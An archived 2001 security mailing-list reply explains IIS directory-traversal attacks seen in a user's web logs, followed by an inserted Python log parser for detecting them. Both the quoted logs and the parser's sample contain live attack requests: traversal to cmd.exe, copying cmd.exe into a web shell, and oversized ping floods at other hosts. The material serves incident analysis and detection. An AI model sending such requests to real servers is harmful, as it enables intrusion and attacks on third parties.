Re: Unicode Logs with Ping Activity

From: Jordan K Wiens (jwiensat_private)
Date: Tue Jul 10 2001 - 10:05:45 PDT


    No, a 502 error is a bad gateway error; what happens is that your iis
    server is unpatched against the unicode exploits (one of them, at least) and
    is executing the command to ping a host.  Just recently there seems to be
    an increase in the number of hackers using vulnerable web servers for ddos-like
    behavior using over-sized pings.
    
    When the ping command executes, it runs the pings; however, it (obviously)
    does not return complete html headers as its output (since ping was never
    meant to run via the web, it's not supposed to run like a normal web
    executable). IIS notices this, and realizes that the script hasn't
    correctly executed, and lets you know with the 502 error.  If you actually
    look at the page, the results would read something like: "502 error; the
    application has not returned correct headers.  The headers it did return
    are:" and then IIS would proceed to show the output of whatever had been
    shown.
    
    The error you want to see once a machine has been fully patched is usually
    a 404 error.
    
    -- 
    Jordan Wiens
    UF Network Incident Response Team
    (352)392-2061
    
    On Tue, 10 Jul 2001 myrddin_eat_private wrote:
    
    > Would like someone to help me understand what is going on here... The 502 
    > error at the end of these entries would indicate failures, wouldn't 
    > they? I've been all through the logs on this box, and even though at every 
    > attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe 
    > shows a 502, it is there.
    > 
    > I'm looking at the times on the log entries and guessing that this was a 
    > manual attack.
    > 
    > Also, can someone please explain what is being attempted with these pings?
    > aaa.aaa.aaa.aaa
    > bbb.bbb.bbb.bbb
    > ccc.ccc.ccc.ccc.ccc
    > ddd.ddd.ddd.ddd.ddd 
    > are all unique addresses.
    > 
    > #Software: Microsoft Internet Information Services 5.0
    > #Version: 1.0
    > #Date: 2001-06-19 18:44:15
    > #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
    > 2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
    > 2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
    > 2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd 502 -
    > Free, encrypted, secure Web-based email at www.hushmail.com
    > 
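
    As an added example (not part of this thread or of any poster's code), here is a small Python parser for an IIS 5.0 W3C extended log like the one quoted above. It flags requests that reach cmd.exe through directory traversal, decodes the command from cs-uri-query, pulls out the ping target, and applies the status-code reading given in the reply (502 = the command ran but returned no headers, 404 = what a patched server answers). The log lines and addresses are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample modelled on the IIS 5.0 W3C log quoted in the thread
# (hypothetical documentation-range addresses stand in for the real ones).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Date: 2001-06-19 18:44:15
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-06-19 18:44:15 192.0.2.10 - 198.51.100.5 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\shell.exe 502 -
2001-06-19 19:24:28 192.0.2.10 - 198.51.100.5 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+203.0.113.7 502 -
2001-06-19 19:31:42 192.0.2.10 - 198.51.100.5 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 -
2001-06-19 19:32:00 192.0.2.22 - 198.51.100.5 80 GET /default.htm - 200 Mozilla/4.0
"""

# A request for cmd.exe reached through parent-directory traversal.
TRAVERSAL_CMD = re.compile(r"\.\..*cmd\.exe", re.IGNORECASE)

# Status meaning for such a request, per the reply: 502 = ran, no CGI headers;
# 404 = the traversal no longer resolves (patched server).
VERDICTS = {"502": "executed", "404": "not_found", "200": "executed_with_output"}

def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def decode_query(q):
    """IIS logs spaces in cs-uri-query as '+' or '%20'; undo both."""
    return "" if q == "-" else unquote(q.replace("+", " "))

def analyze_log(text):
    """Return one finding per traversal request for cmd.exe."""
    findings = []
    for rec in parse_w3c(text):
        if not TRAVERSAL_CMD.search(rec["cs-uri-stem"]):
            continue
        cmd = decode_query(rec["cs-uri-query"])
        args = cmd.split()
        f = {"time": rec["date"] + " " + rec["time"], "client": rec["c-ip"],
             "command": cmd, "status": rec["sc-status"],
             "verdict": VERDICTS.get(rec["sc-status"], "other")}
        if "ping" in args:            # outbound flood launched via the web server
            f["ping_target"] = args[-1]
        findings.append(f)
    return findings
```

Run it over a real log by passing the file contents to `analyze_log`; a server whose cmd.exe requests all come back `not_found` is behaving the way the reply says a patched one should.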
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    
    



    This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 10:15:34 PDT